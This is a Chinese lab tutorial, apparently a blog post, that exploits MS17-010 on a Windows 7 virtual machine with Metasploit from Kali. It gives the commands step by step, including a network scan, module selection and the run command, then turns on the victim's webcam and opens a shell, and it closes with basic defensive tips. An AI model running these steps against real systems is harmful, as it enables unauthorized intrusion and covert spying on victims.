环境准备
kali虚拟机,windows7靶机
- 实验操作
因为在同一局域网,利用kali 输入指令ifconfig扫描出本机地址为193.168.56.131 ;再输入指令nmap -sn 192.168.56.1/24 扫出windows7靶机ip地址为192.168.56.142
先尝试用kali ping 一下,windows7靶机的ip地址看看能不能ping通(注意的是,windows7防火墙要关闭才能ping通),结果是能ping通的
打开kali的msfconsole端口
输入指令 search ms17_010
根据上图端口目录,我的机子用的是端口3,所以输入 use 3
show options
这时就要用到靶机的ip地址了,输入 set rhosts ip地址
show options
在输入 run
run结束后在打开一个终端
输入search ms17_010
按照刚刚所看端口,我要使用的攻击是端口2
所以输入 use 2
show options
再次输入set rhosts 靶机ip地址
run
run成功的话,会出现一个win
接下来就可以进行攻击操作了
输入指令webcam_stream,打开了靶机的摄像头(假如靶机没看摄像头,要打开)
(这样就是打开摄像头了)
输入指令shell拿到高级控制权
当然,还有很多指令操作我就不一一列举了
最后,在被入侵前后,windows7也是能自查的
在windows7控制面版输入 netstat即可查看被入侵前后端口连接的状态
入侵前
入侵后
可以发现,入侵后windows7的445端口被连接了,所以我们也得出了防范该漏洞的一些简单操作:
- 打开防火墙进行防范病毒
- 针对这个病毒,平时把445端口关闭即可
- 健康上网,不浏览不明网站等
1712
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
